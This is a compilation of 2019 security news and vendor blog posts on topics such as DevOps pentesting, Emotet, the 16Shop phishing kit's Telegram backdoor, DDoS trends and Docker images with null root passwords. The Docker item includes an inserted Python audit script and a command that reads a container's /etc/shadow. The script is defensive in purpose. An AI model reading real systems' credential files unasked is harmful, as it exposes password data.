These new technologies allow faster development, but also come with the side effect of introducing a new attack surface and different types of vulnerabilities. Like any new technology, systems within a DevOps environment are often deployed insecurely and misconfigured. This makes the requirement to conduct security testing on the DevOps environment more important than ever. Moreover, what about the developers themselves from a security awareness perspective? What might they be discussing with peers on online forums, leaving in code repositories, or other areas on the Internet that may make their applications and the organization more susceptible to targeted phishing attacks, data leaks, and breaches that we hear about in the news on almost a daily basis?

What Is Veracode DevOps Penetration Testing?

Automating security testing is a key concept when building out a DevOps process and should not be overlooked. However, there is still a need for penetration testing in a DevOps environment. Penetration testing provides something that automation cannot -- the attacker’s perspective.

Building upon our strong application penetration testing service and highly skilled team, Veracode DevOps Penetration Testing provides testing above and beyond the application to include the operations and infrastructure components of applications. Technologies that can be in scope for this type of testing include, but are not limited to:

  • Containers like Docker and Kubernetes orchestration
  • Microservices and related interactions
  • CI tool environments like Hudson and Jenkins
  • Cloud infrastructure (AWS, Azure) and cloud storage databases
  • Network infrastructure related to application deployment and configuration management

The Importance of Open Source Intelligence and DevOps

Veracode DevOps Penetration Testing also provides Open Source Intelligence (OSINT) analysis as part of every DevOps Penetration Test we perform. This analysis identifies misconfigured cloud storage databases such as AWS S3 buckets, Elasticsearch, MongoDB instances, and others. If you haven’t been paying attention to the news, misconfigured cloud storage databases are some of the largest sources of data leaks and breaches we see today*. In addition, we also leverage OSINT techniques to find vulnerabilities in the infrastructure that may leave your organization and applications exposed.

As part of this process, testers will also look into the activities of the developers themselves. Our testing checks to see if developers are practicing proper security measures. For example, we will analyze GitHub repositories looking for exposed credentials, locating sensitive data related to app development, and seeing what’s being discussed about an organization’s applications within popular public developer forums like Stack Overflow.

DevOps and Security Compliance

Security compliance does not magically go away when organizations “shift left.” That’s why Veracode DevOps Penetration Testing can be used to meet compliance requirements for PCI DSS 11.3 as well as GDPR Article 32 in the European Union. This requirement is also important for those organizations that need to comply with GDPR outside of the EU. GDPR Article 32 covers “Security of processing,” which requires that the data controller and processor implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk. This includes “a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing” **. Penetration testing can help meet this new compliance requirement.

Veracode Is a Complete DevOps Testing Solution

Veracode DevOps Penetration Testing combined with Veracode’s static, dynamic, SCA, and application penetration testing provides the most comprehensive testing available for a DevOps environment in the market today. Contact your Veracode Sales or Services representative for more details on how to get started with your first Veracode DevOps Penetration Testing engagement.

Learn more about Veracode DevOps Penetration Testing here.

Cisco is a Representative Vendor in the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market

According to Gartner [1], “Applying behavioral analysis to network traffic is helping enterprises detect suspicious traffic that other security tools are missing.”

The case for network traffic analysis to uncover hidden threats

You are charged with protecting your organization and have made multiple investments to do so. But you might be under-utilizing one of the biggest investments your organization has already made – the network infrastructure. With 1 in 4 organizations running the risk of a major breach in the next 24 months, it’s not a matter of if but when you will be breached. And you need to be able to detect and respond quickly to incidents.

The network is a rich data source, and by analyzing how the different entities are “behaving” within the network, we can identify malicious activities associated with a breach. This helps detect attacks in near real time. Today, the average time to detect a breach is 197 days [2]. Can you really afford to wait more than 6 months to know whether you have been compromised? Additionally, network security analytics can expedite investigations to pinpoint the source of the threat so you can take appropriate actions. This considerably cuts down the time to contain a threat from the average 69 days [3] to a few hours!

Cisco’s network traffic analysis (NTA) solution, Stealthwatch, provides enterprise-wide visibility, from the private network to the public cloud, and applies advanced security analytics to detect and respond to threats in real time. Using a combination of behavioral modeling, machine learning and global threat intelligence powered by Cisco Talos, Stealthwatch can quickly, and with high confidence, detect threats such as command and control attacks, ransomware, DDoS attacks, illicit cryptomining, unknown malware, as well as insider threats. With a single, agentless solution, you get comprehensive threat monitoring across the data center, branch, endpoint and cloud, and even find threats hidden in encrypted traffic.

Stealthwatch has some key attributes that you should demand from your network traffic analysis solution for the following outcomes:

Contextual network-wide visibility

First and foremost, network traffic analysis provides visibility into every device on the network and what it is doing. Legacy servers, IoT, mobile, and remote users – a lot of organizations simply don’t know what’s on their network, let alone how to protect it. And this visibility extends across all the dynamic environments that are typical of the modern digital enterprise – from the campus, branch and data center to the cloud. And with the rise in encrypted traffic and the internet going dark, you also need visibility into threats hiding in encrypted traffic.

Predictive threat analytics

Secondly, there are some unique threats that can only be detected if you are continuously monitoring network activity. Your traditional security tools will not be able to catch insider threats – caused by a rogue employee trying to exfiltrate sensitive data, or by a compromised admin credential that attackers are now using to move across the entire organization. Additionally, you have created a lot of security policies to prevent threats, or simply to remain compliant. But how do you know those are being enforced? That the controls you have set up are actually working? Also, as mentioned earlier, network traffic analysis tries to identify malicious behavior and can therefore help detect threats like unknown malware.

Accelerated response

Lastly, let’s talk about incident response. What do you do if you know that you have been compromised? Where do you begin investigating? With network traffic analysis, you can attribute the malicious behavior to a specific IP and perform forensic analysis to determine how the threat has moved laterally within the organization: what other devices might be infected, where communication is occurring externally, and so on. This leads to faster response in order to prevent any business impact.

Download your complimentary copy of the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market here.

To learn more about Cisco Stealthwatch, go to

  1. Gartner Market Guide for Network Traffic Analysis, Lawrence Orans, Jeremy D’Hoinne, Sanjit Ganguli, 28 February 2019.
  2. Source: Ponemon 2018 Cost of a Data Breach Study
  3. Source: Ponemon 2018 Cost of a Data Breach Study
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Cisco is a Representative Vendor in the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market appeared first on Cisco Blog.

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies, as only a quarter of organizations admit to using it for at-rest data, and for emails and data centers.

According to research by Thales and IDC, email encryption is adopted by only around 27% of the European respondents they recently surveyed, while the numbers decline for data at rest, data centers, Big Data environments and full disk encryption. The only instance of European respondents ranking higher than the global number was in using cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now transverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.” 

Sharp Rise in Phishing Attacks against SaaS, Webmail Services

Phishing attacks against businesses offering SaaS (Software-as-a-service) and web-based email services have increased considerably in the first quarter of the current year, as per a recent report.

According to the Phishing Activity Trends Report released by APWG (Anti-Phishing Working Group) and focusing on the period between January and March 2019, cybercrime groups have shifted their attention from payment services to businesses offering SaaS and web-based email services. At the same time, there has been a considerable decrease in the volume of attacks against cloud storage and file hosting sites; from 11.3 percent it has dropped to around 2 percent.

It’s only natural for cybercriminals to target SaaS platforms and webmail services, since these are becoming more and more popular. Their rising popularity comes from the fact that these services are easy to use by anyone with internet access and provide online business solutions. Such services are targeted mostly through phishing attacks. Experts point out that although many businesses today are concerned about targeted hacking and DDoS attacks, most organizations seem to be worried most about phishing attacks.

The APWG report points out that 36 percent of all phishing attacks that took place in Q1 targeted SaaS and webmail services. The report states, “Phishing that targeted Software-as-a-Service (SaaS) and webmail services became the biggest category of phishing. At 36 percent of all phishing attacks, it eclipsed phishing against the payment services category for the first time.”

The report also points out that the total number of phishing websites detected by APWG in Q1 was up notably over Q3 and Q4 of 2018. Similarly, the number of phishing attacks hosted on Websites having HTTPS and SSL certificates also reached a new high. The report states, “The total number of phishing sites detected by APWG in 1Q was 180,768. That was up notably from the 138,328 seen in 4Q 2018, and from the 151,014 seen in 3Q 2018…The number of unique phishing reports submitted to APWG during 1Q 2019 was 112,393. These were phishing emails submitted to APWG, and exclude phishing URLs reported by APWG members directly into APWG’s eCrime eXchange.”

Through such phishing attacks, cybercriminals seek to steal sensitive data like geolocation, email addresses, credit card data, payment details, personal preferences of users etc.

Now, let’s discuss the relevance of the report’s findings in the current context. On the one hand, the rise in phishing attacks targeting businesses offering SaaS and webmail services is notable. At the same time, hackers are increasingly using SSL/HTTPS-hosted websites (which are usually thought to be secure) for executing phishing attacks. The report also explains that of all phishing attacks, 36 percent targeted SaaS/webmail services, 27 percent targeted payment solutions, 16 percent targeted financial institutions, 15 percent targeted other organizations and only 3 percent targeted eCommerce / Retail and Telecom. In this context, two things need to be noted. On the one hand, it is highly important that organizations adopt advanced security solutions and digital forensics to protect themselves and to detect threats, attacks and the bad actors behind them. On the other hand, they must also adopt a well-planned and legitimate security policy and at the same time train their employees to stay wary of phishing scams, since their clients’ data policy should also be of utmost importance to them.

APWG is a not-for-profit industry association comprising over 2,000 enterprises worldwide and focused on eliminating identity theft and fraud caused by phishing, crimeware, and email spoofing.


The post Sharp Rise in Phishing Attacks against SaaS, Webmail Services appeared first on .

A Cybersecurity Guide for Digital Nomads

Technology has unlocked a new type of worker, unlike any we have seen before—the digital nomad. Digital nomads are people who use technologies like WiFi, smart devices, and cloud-based applications to work from wherever they please. For some digital nomads, this means their favorite coffee shop or co-working space. For others, it means an idyllic beach in Bali or countryside public house. One thing remains true wherever a digital nomad may choose to lay down their temporary roots: They are at a higher cybersecurity risk than a traditional worker. So what risks should they look out for? 

Public WiFi

Without a doubt, public WiFi is one of the main cybersecurity hazards many digital nomads face. The massive and unresolved flaw in the WPA2 encryption standard used by modern WiFi networks means that anyone connecting to a public network is putting themselves at risk. All public WiFi options—including WiFi provided by hotels, cafes, and airports—pose the risk of not being secure. How can a digital nomad be digital if their main source of internet connectivity is a cybersecurity minefield?

When connecting to public WiFi as a digital nomad, it is crucial to keep your web traffic hidden behind a virtual private network (VPN). A quality VPN app is simple to set up on your mobile devices—including laptops and smart phones—and uses a strong encryption protocol to prevent hackers and other snoops from stealing important personal information such as account passwords, banking information, and private messages. VPNs will keep your data encrypted and secure from prying eyes, regardless of locale.

Device Theft

Physical device theft is a very real risk for digital nomads, but one that can largely be avoided. The first and most obvious step to doing so is to never leave your devices unattended, even if your seatmate at the coffee shop seems trustworthy. Always be mindful of your device visibility; keeping your unattended devices and laptop bags locked away or out of sight in your hotel room is often all it takes to prevent theft. Purchasing a carrying case with a secure access passcode or keyed entry can also act as an additional deterrent against thieves looking for an easy mark. 

If your device is stolen, how can you prevent the damage from spiraling? Taking a few defensive measures can save digital nomads major headaches. Keep a device tracker enabled on all of your devices—smartphones, tablets, and laptops. Both Apple and Android have default services that will help you locate your missing device.  

But this will only help you find your property; it won’t prevent anyone from accessing the valuable data within. That’s why all of your devices should have a lock screen enabled, secured with either a pin or a biometric ID, such as your fingerprint. If you believe these efforts have failed and your device is compromised, enabling multi-factor authentication on your most sensitive accounts should help reduce the effect of the breach.  

However, if you cannot recover your device, remotely wiping it will prevent any additional data from being accessed. If you have a device tracker enabled, you will be able to remotely wipe your sensitive data with that software. If you’re using a data backup solution, any lost files will be recoverable once the status of your devices is secure.

Lower Your Risk

Being a digital nomad means that you’re at a higher risk for a breach, but that doesn’t mean you can’t take steps to lower that risk. These best practices could drastically reduce the risk incurred by leading a digitally nomadic lifestyle. 

  • Toggle off. Remember to always turn off WiFi and Bluetooth connectivity after a session. This will prevent accidental or nefarious connections that could compromise your security. 
  • Mindfulness. Be aware of your surroundings and of your devices. Forgetting a device might be an acceptable slip up for most, but for a digital nomad it can bring your lifestyle to a grinding halt. 
  • Be prepared. Secure your devices behind a trusted VPN before beginning any remote adventures. This will encrypt all of your web traffic, regardless of where you connect.  
  • Stop the spread. In case of a device or account breach, strong passwords and multi-factor authentication will help minimize the damage. 

A staggering 4.8 million Americans describe themselves as digital nomads, a number that won’t be going down anytime soon. With remote work becoming the new norm, it’s more important than ever that we take these cybersecurity measures seriously—to protect not just ourselves, but also our businesses and clients. Are you a digital nomad making your way through the remote work landscape? Let us know your top tips in the comments below!

The post A Cybersecurity Guide for Digital Nomads appeared first on Webroot Blog.

Core Elastic Stack security features now available to all users

Elastic, the company developing enterprise search engine Elasticsearch and the Elastic Stack, has decided to make core Elastic Stack security features accessible to all users (and not just those who have a Gold subscription). What is the Elastic Stack? Elasticsearch is the most widely used enterprise search engine in the world. It is usually used for log, business, operational and security intelligence analytics. It is part of the Elastic Stack, an integrated solution that also … More

The post Core Elastic Stack security features now available to all users appeared first on Help Net Security.

What is Emotet?


Emotet malware was first identified in 2014 as a banking trojan. Since then it has evolved from a banking trojan into a threat distributor. It hit many organizations very badly in 2018 with functionalities such as spamming and spreading. With its widespread reach across many organizations, it became a threat distributor. Since mid-2018, Emotet has been used by threat actors to spread other malware such as TrickBot, Qakbot and, most dangerous of all, Ryuk ransomware. It has also been observed that it loads modules and launches different malware depending on the geographical location, i.e. the country of the victim.

The malware authors’ strategy is to use infected systems for every purpose: first for credential stealing, then using those credentials for spreading and spamming. Finally, once all use of the infected system is exhausted, it deploys other malware such as ransomware, TrickBot and Qakbot.

Since mid-2018, Emotet has become a headache for security providers because of its polymorphic, self-updating and spreading capabilities, which make cleaning an infected network very complex; cleanup sometimes takes months.

How can it enter your system?

It enters your system through a phishing mail, as shown in the figure below:

Such emails contain malicious attachments such as doc, pdf, xls or js files. Once the user opens the attachment, it downloads and launches Emotet. Sometimes such mail contains malicious links which, when opened by the user, download and launch Emotet. The other way is lateral spreading: if one of your friends or colleagues on the same network is infected with Emotet, their machine can deploy Emotet on your machine.

What can Emotet do?

It has many capabilities, including password stealing, email harvesting, spamming, lateral spreading and launching other malware. All of these are discussed in detail in our research paper on Emotet.


According to US-CERT alert released on July 20, 2018, “Emotet continues to be amongst the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”

At Quick Heal Labs, we have seen many of our customers badly affected by the spamming done by Emotet. As the malware sends many phishing mails to the user’s contacts, the mail server reaches its maximum limits and blocks the user’s account for the day. As a result, most employees of such an infected organization cannot send mail. Such blockages disrupt regular operations and can further harm an organization’s reputation. Finally, after a week or two, we were able to clean the entire network.

A Ryuk ransomware infection may cause temporary or permanent loss of the user’s critical data.

What Quick Heal’s telemetry says:

As you can see, the number of hits per day has been very high from July 2018 till April 19. It indicates how widespread Emotet is. But the same is not the case with the actual number of customer escalations. At Quick Heal Labs, even after detecting thousands of samples per day, we received many customer escalations in the initial months after the outbreak. We then added rules, IOCs and signatures at each level of product features, namely Virus Protection, Behavior Detection, Email Protection, Memory Scan, IDS & IPS, machine-learning-based detection and Browsing Protection. This resulted directly in zero customer escalations for Emotet over the last few months, with already infected customers also totally cleaned. The stats indicate that we have been detecting thousands of Emotet samples per day in the last few months, and still NO customer escalation or issue has been reported.

How can I remove Emotet?

If your machine is on an organization’s network, isolate it immediately. Patch the installed software with the latest updates and clean the system.

As Emotet can move laterally within a network, your machine can be infected again when you reconnect to the network. Identify and clean each infected machine on the same network. This is a really complex process to follow. One can always choose Quick Heal Antivirus / Seqrite Endpoint Security to avoid this complex process and stay safe, with cleaning of already infected machines and proactive blocking of future Emotet infections.

Preventive measures

  1. Keep your computer up-to-date with the latest updates of the operating system, security software and other software.
  2. Don’t open any link in a mail received from an unknown/untrusted source.
  3. Don’t download attachments received from an unknown/untrusted source.
  4. Don’t enable ‘macros’ for Microsoft Office documents.
  5. Educate yourself and others about keeping strong passwords.
  6. Use two-factor authentication wherever possible.


Stats indicate that we have been detecting thousands of Emotet samples per day in the last few months and still NO customer escalation/issue has been reported. With this we can say that Quick Heal has been able to stop Emotet to date. As it is always a cat-and-mouse game between malware and security vendors, we expect Emotet to evolve to the next step. We will continue monitoring Emotet and will ensure all customers are secured against such malware.

To read more about the detailed analysis of the Emotet, download this PDF.

The post What is Emotet? appeared first on Seqrite Blog.

How Technology and Politics Are Changing Spycraft

Interesting article about how traditional nation-based spycraft is changing. Basically, the Internet makes it increasingly possible to generate a good cover story; cell phone and other electronic surveillance techniques make tracking people easier; and machine learning will make all of this automatic. Meanwhile, Western countries have new laws and norms that put them at a disadvantage over other countries. And finally, much of this has gone corporate.

DDoS Attacks on the Rise After Long Period of Decline


The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered a substantial growth in the amount of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-Hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Lab’s advice for DDoS attack defense included:

  • Ensuring that web and IT resources can handle high traffic
  • Using professional solutions to protect the organization against attacks

HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider

A recent attack wave involving HawkEye malware sends data stolen from its victims to another keylogger provider’s website. On 21 May, My Online Security came across a new sample of HawkEye. The actual delivery mechanism itself wasn’t unique compared to previous attacks involving the malware. In this particular instance, the attack email used the lure […]… Read More

The post HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider appeared first on The State of Security.

Washington Issues Temporary License to Huawei


The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on an Entity List last week, the Commerce Department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Phishing Kit 16Shop Targets Apple Users, Hackers


Researchers have discovered a hidden backdoor in a commercial phishing kit, 16Shop, used to attack Apple customers, according to Akamai.

“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves," wrote Akamai researcher Amiram Cohen.

According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.


The phishing kit was allegedly developed by an Indonesian whom Cohen said “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”

Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen, multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”

However, some users of the phishing kit have been sharing their criminally obtained information without their knowledge through a backdoor that makes a copy of the victim's information and secrets it over to a bot waiting in a room on Telegram, according to Cohen.

“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.

The author reportedly has released video demonstrations showing active usage of Telegram as a means of data storage. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.

Aussie Government IT Worker Arrested for Cryptomining


An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work.

The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP).

At Sydney Local Court, he was charged with unauthorized modification of data to cause impairment, and unauthorized modification of restricted data, contrary to the Criminal Code Act 1995.

The charges carry a maximum penalty of 10 years and two years behind bars, respectively.

“Australian taxpayers put their trust in public officials to perform vital roles for our community with the utmost integrity,” argued acting commander, Chris Goldsmid, AFP manager cybercrime operations. “Any alleged criminal conduct which betrays this trust for personal gain will be investigated and prosecuted.”

It’s unclear how the man was eventually caught, but his home was raided by the AFP in March, and a personal laptop, phone, employee ID cards and data files were seized.

Cryptocurrency mining continues to be a threat to businesses, while consumer detections have fallen to almost zero, according to a Malwarebytes report released in April. It said the latter trend had been influenced by Coinhive’s decision to shut down earlier this year.

Although most cryptomining in businesses occurs covertly, directed by external botnet herders in charge of compromised machines, there is always the risk of an insider threat.

A Chinese headmaster was fired last year after secretly mining cryptocurrency using his school’s electricity supply. Hunan man Lei Hua hooked up eight mining machines to the mains, running up an electricity bill of 14,700 yuan ($2125) mining Ethereum 24 hours a day.

Microsoft updates break AV software, again!

Microsoft’s May 2019 security fixes have again disrupted the normal functioning of some endpoint security products on certain Windows versions. Current problems “We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on ‘Configuring 30%’,” UK-based Sophos explained. “We have currently only identified the issue on a few customers running Windows 7 and Windows … More

The post Microsoft updates break AV software, again! appeared first on Help Net Security.

Fifth of Docker Containers Have No Root Passwords


A fifth of the world’s most popular Docker containers contain a security issue which could make them vulnerable to attack in some circumstances, a researcher has discovered.

Kenna Security principal security engineer, Jerry Gamblin, explained that after recent Cisco Talos research revealed Alpine Linux docker images were shipping with no (nulled) root passwords, he decided to dig a little deeper.

Running a script on the 1000 most popular containers in the Docker store, he found 194 (19.4%) also had nulled root passwords.

“The findings are interesting, but I don’t want to be overly alarmist. Just because a container has no root password does not mean that it is automatically vulnerable,” he explained.

“These findings could lead to configuration-based vulnerabilities in certain situations, as was the case with the Alpine Linux vulnerability.”

Specifically, only containers which use Linux pluggable authentication modules (PAM) or “some other mechanism which uses the system shadow file as an authentication database” are vulnerable to exploitation, as Cisco detailed.

The most popular container on the list affected by the issue was kylemanna/openvpn: a software unit that has been used over 10 million times, according to Gamblin.

Other names on the list included govuk/governmentpaas, hashicorp, microsoft, monsanto and mesosphere.

In the Alpine Linux case, exposed containers are at risk from the Docker image vulnerability (CVE-2019-5021), whereby an attacker can elevate their privileges to root within the container.

“Deploying containers that allow users to authenticate as root should be avoided at all costs, because authenticating as root is already outside the scope of ‘best practices’ for secure containers or generally in system,” argued Gamblin.
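The check behind these findings comes down to reading each image's /etc/shadow and looking for accounts whose password field is empty. The following is an added example, not Gamblin's script or Talos' code: it classifies every shadow entry as null, locked or hashed and reports exposure only when the image actually authenticates against the shadow file, as the Cisco note above qualifies. The shadow content is constructed for illustration; on a real image you would feed it the output of `docker run --rm <image> cat /etc/shadow`.

```python
"""Audit /etc/shadow content for accounts with a null (empty) password field.

Added example for the null-root-password finding discussed above; it is not
the script Gamblin ran nor Talos' code. SAMPLE_SHADOW is constructed.
"""
from typing import Dict, List

# Constructed sample: a nulled root entry (the Alpine shape), two locked
# system accounts, and one account with a real SHA-512 style hash.
SAMPLE_SHADOW = """\
root:::0:::::
daemon:*:18000:0:99999:7:::
bin:!:18000:0:99999:7:::
app:$6$saltsalt$Qw3rTyUiOpAsDfGhJkLzXcVbNm0123456789abcdefghijklmnopqrstuvwxyz./:18000:0:99999:7:::
"""


def classify_password_field(field: str) -> str:
    """Classify the second (password) field of a shadow entry.

    ""            -> "null":   no password is set; shadow-based auth accepts an empty one
    "!", "*", ... -> "locked": no hash can match, the account cannot log in by password
    anything else -> "hashed": a normal crypt(3) hash
    """
    if field == "":
        return "null"
    if field.startswith(("!", "*")):
        return "locked"
    return "hashed"


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user name -> password classification for every well-formed line."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:  # a real shadow line has nine colon-separated fields
            continue
        result[fields[0]] = classify_password_field(fields[1])
    return result


def null_password_accounts(text: str) -> List[str]:
    """Names of accounts whose password field is empty, sorted for stable output."""
    return sorted(user for user, cls in parse_shadow(text).items() if cls == "null")


def image_is_exposed(text: str, uses_shadow_auth: bool) -> bool:
    """A nulled root only matters when PAM or another mechanism authenticates
    against the shadow file; without that, the finding is hygiene, not exposure."""
    return uses_shadow_auth and "root" in null_password_accounts(text)


if __name__ == "__main__":
    for user, cls in parse_shadow(SAMPLE_SHADOW).items():
        print(f"{user:8s} {cls}")
    print("null-password accounts:", null_password_accounts(SAMPLE_SHADOW))
    print("exposed with PAM:", image_is_exposed(SAMPLE_SHADOW, uses_shadow_auth=True))
```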

KnowBe4 Announces Acquisition of CLTRe


KnowBe4 has announced the acquisition of CLTRe, adding the capability to measure security culture into its portfolio.

Led by Kai Roer, CLTRe is a Norwegian company focused on helping organizations assess, build, maintain and measure a strong security posture. It will continue to operate as an independent subsidiary of KnowBe4.

The acquisition will mean that CLTRe’s toolkit and Security Culture Framework will be available to all KnowBe4 customers later this year.

Stu Sjouwerman, CEO of KnowBe4, said: “Today’s announcement brings KnowBe4 very valuable tools to help our customers measure what matters – their security culture – so they can make decisions about how to improve. We’re excited to welcome Kai and the CLTRe team to the KnowBe4 family and to enhance our European presence while supporting more global customers.”

Roer said that KnowBe4 “is a natural fit for our evidence-based analytics and measurement tools, as KnowBe4 customers will now be able to measure their security cultures, benchmark against their industry sectors, and pinpoint exactly what kind of security culture they have.”

He said: “With KnowBe4 and CLTRe, organizations can gain true insight into their security culture, improve their security with pinpoint accuracy, report their progress to their board of directors and educate their users to make smarter security decisions.”

CLTRe measures the seven dimensions of security culture: behavior, responsibilities, cognition, norms, compliance, communication and attitudes.  

Listen to Kai Roer, along with Espen Otterstadt and Nicola Whiting, discussing security culture as part of the Infosecurity Magazine Online Summit.

GDPR one year on

May 2019 marks the first anniversary since the General Data Protection Regulation came into force. What has changed in the world of privacy and data protection since then? BH Consulting looks at some of the developments around data breaches, and we briefly outline some of the high-profile cases that could impact on local interpretation of the GDPR.

Breach reporting – myths and misconceptions

Amongst the most immediate and visible impacts of the GDPR was the requirement to report data breaches to the supervisory authority. In the context of GDPR, a personal data breach means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data. The regulation introduced a duty on all organisations to report personal data breaches to the supervisory authority where they are likely to pose a risk to data subjects. This report must take place within 72 hours of the controller becoming aware of the breach, where feasible. There are additional obligations to report the breach to data subjects, without undue delay, if the breach is likely to result in a high risk of adversely affecting individuals’ rights and freedoms.

Between May 2018 when GDPR came into force, and January 2019, there were 41,502 personal data breaches reported across Europe, according to figures from the European Data Protection Board. In Ireland, the Data Protection Commission recorded 3,542 valid data security breaches from 25 May to 31 December 2018. This was a 70 per cent increase in reported valid data breaches compared to 2017.

Notwithstanding the uptick in the number of reported breaches, it has been suggested that many organisations are still unsure how to spot a data breach, when a breach may meet the criteria for reporting, or even how to go about reporting. With this in mind, the key lessons to consider are:

Not every breach needs to be reported

Organisations controlling and processing personal data should have a process in place to assess the risks to data subjects if a breach occurs. This assessment should focus on the severity and likelihood of the potential negative consequences of the breach on the data subject.

Assess the risks

When assessing whether to report, the controller will need to consider the type of breach, sensitivity and volume of the personal data involved, how easily individuals can be identified from it, the potential consequences and the characteristics of the individual or the controller (such as if the data relates to children or it involves medical information).

Who’s reporting first?

It’s possible the supervisory authority may hear about the breach from other sources including the media or affected data subjects. If this is the case, an authority such as the DPC may reach out to the affected organisation first, even before that entity has reported.

Establish the facts

As a final point, it is important not to forget that, even if you do not need to report a breach, the GDPR requires you to document the facts relating to it, its effects and the remedial action taken. Therefore, you should keep a record of all privacy incidents, even if they do not rise to a reportable level. This will help you learn from any mistakes and meet accountability obligations.

Points to note

